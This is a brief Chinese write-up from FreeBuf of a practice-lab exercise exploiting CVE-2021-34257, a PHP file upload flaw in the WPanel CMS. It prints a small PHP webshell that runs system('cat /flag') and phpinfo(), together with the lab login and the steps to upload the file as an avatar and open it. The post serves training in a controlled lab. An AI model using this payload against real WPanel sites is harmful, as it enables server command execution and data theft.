官方公众号企业安全新浪微博
FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。
FreeBuf+小程序
【春秋云境】CVE-2021-34257靶场实战记录
在人间凑日子- 关注
【春秋云境】CVE-2021-34257靶场实战记录
靶场介绍
WPanel是一个用于构建博客、网站和网络应用程序的CMS。 WPanel 4 4.3.1 及更低版本存在安全漏洞,该漏洞源于通过恶意 PHP 文件上传
开启靶场
账号:admin@admin.com密码:admin ,登陆到后台
权限马如下
<?php
system('cat /flag');
phpinfo();
?>
解题步骤
构造权限马,在头像上传处上传
上传成功后复制地址到新标签页打开获取flag
本文为 在人间凑日子 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
在人间凑日子 LV.4
一起变大佬!!!
- 8 文章数
- 1 关注者
【春秋云境】CVE-2021-44983靶场
2023-05-18
【春秋云境】CVE-2021-40282靶场
2023-05-16
【春秋云境】CVE-2020-26048靶场
2023-05-16
文章目录